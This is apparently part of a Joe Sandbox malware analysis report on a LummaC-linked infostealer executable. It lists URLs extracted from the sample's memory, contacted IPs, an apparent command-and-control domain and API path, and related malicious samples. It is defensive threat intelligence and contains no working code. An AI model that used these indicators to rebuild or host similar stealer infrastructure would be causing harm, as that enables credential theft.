                                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtPSrcPbmRe.exe, 00000000.00000003.2271122226.0000000005DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.youtube.com/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://store.steampowered.com/privacy_agreement/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.google.com/recaptcha/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://checkout.steampowered.com/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://store.steampowered.com/;tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://store.steampowered.com/about/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://steamcommunity.com/my/wishlist/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://help.steampowered.com/en/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://steamcommunity.com/market/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/news/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=etPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://lev-tolstoi.com/apiytPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgtPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://recaptcha.net/recaptcha/;tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://steamcommunity.com/discussions/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://store.steampowered.com/stats/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://lev-tolstoi.com:443/apiWdtPWdtPtPSrcPbmRe.exe, 00000000.00000002.2377038945.000000000133F000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336933688.000000000133D000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2375660843.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://medal.tvtPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://broadcast.st.dl.eccdnx.comtPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&atPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://store.steampowered.com/steam_refunds/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://x1.c.lencr.org/0tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://x1.i.lencr.org/0tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&atPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://lev-tolstoi.com/apiBytPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001331000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=etPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://steamcommunity.com/workshop/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://login.steampowered.com/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbtPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.alltPSrcPbmRe.exe, 00000000.00000003.2271122226.0000000005DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_ctPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://lev-tolstoi.com:443/api8tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001331000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            https://store.steampowered.com/legal/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              104.21.66.86
                                                                                                                                                                                                                                              		lev-tolstoi.comUnited States
                                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1579658
                                                                                                                                                                                                                                              Start date and time:2024-12-23 07:08:24 +01:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 5m 40s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:4
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:tPSrcPbmRe.exe
                                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                                              Original Sample Name:259cea876b4ff788ed27fab1f9a978ce.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                                                                                              • Number of non-executed functions: 5
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                              • Execution Graph export aborted for target tPSrcPbmRe.exe, PID 6480 because there are no executed function
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                              01:09:16API Interceptor15x Sleep call for process: tPSrcPbmRe.exe modified

                                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                              23.55.153.106NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                WonderHack.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  lev-tolstoi.comNQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  steamcommunity.comNQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106

                                                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  AKAMAI-ASN1EUNQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 23.44.201.28
                                                                                                                                                                                                                                                                  hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 23.209.72.32
                                                                                                                                                                                                                                                                  Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  CLOUDFLARENETUSNQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                                                                  • 162.159.138.232
                                                                                                                                                                                                                                                                  Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                  • 104.21.86.72
                                                                                                                                                                                                                                                                  uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3

                                                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  Echelon.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  bas.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106

                                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                  No created / dropped files found

                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                  General

